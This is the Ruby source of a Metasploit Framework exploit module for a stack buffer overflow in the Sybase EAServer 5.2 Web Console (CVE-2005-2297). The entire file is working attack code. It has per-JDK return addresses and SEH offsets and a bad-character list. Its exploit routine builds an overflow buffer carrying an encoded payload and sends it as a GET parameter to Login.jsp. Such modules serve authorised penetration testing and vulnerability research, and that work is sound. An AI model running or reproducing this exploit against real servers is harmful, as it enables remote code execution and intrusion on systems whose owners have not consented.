metasploit-framework/modules/exploits/windows/http/sybase_easerver.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Sybase EAServer 5.2 Remote Stack Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the Sybase EAServer Web
        Console. The offset to the SEH frame appears to change depending
        on what version of Java is in use by the remote server, making this
        exploit somewhat unreliable.
      },
      'Author'         => [ 'Unknown' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2005-2297' ],
          [ 'OSVDB', '17996' ],
          [ 'BID', '14287'],
        ],
      'Privileged'     => false,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    	=> 1000,
          'BadChars' 	=> "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\\$\%",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Technically we could combine these into a single multi-return string...
          ['Windows All - Sybase EAServer 5.2 - jdk 1.3.1_11', {'Ret' => 0x6d4548ff, 'Offset' => 3820}],
          ['Windows All - Sybase EAServer 5.2 - jdk 1.3.?.?',  {'Ret' => 0x6d4548ff, 'Offset' => 3841}],
          ['Windows All - Sybase EAServer 5.2 - jdk 1.4.2_06', {'Ret' => 0x08041b25, 'Offset' => 3912}],
          ['Windows All - Sybase EAServer 5.2 - jdk 1.4.1_02', {'Ret' => 0x08041b25, 'Offset' => 3925}],
        ],
      'DisclosureDate' => 'Jul 25 2005'))

    register_options(
      [
        OptString.new('DIR', [ true, "Directory of Login.jsp script", '/WebConsole/' ]),
        Opt::RPORT(8080)
      ])
  end

  def exploit

    print_status( "Attempting to exploit...")

    # Building the evil buffer
    crash = rand_text_alphanumeric(5000, payload_badchars)
    crash[ target['Offset'] - 4, 2 ] = "\xeb\x06"
    crash[ target['Offset']    , 4 ] = [target.ret].pack('V')
    crash[ target['Offset'] + 4, payload.encoded.length ] = payload.encoded

    # Sending the request
    res = send_request_cgi({
      'uri'       => normalize_uri(datastore['DIR'], 'Login.jsp'),
      'method'    => 'GET',
      'encode_params' => false,
      'headers'   => {
        'Accept' => '*/*',
      },
      'vars_get'  => {
        crash => nil
      }
    }, 5)

    print_status("Overflow request sent, sleeping for four seconds")
    select(nil,nil,nil,4)
  end
end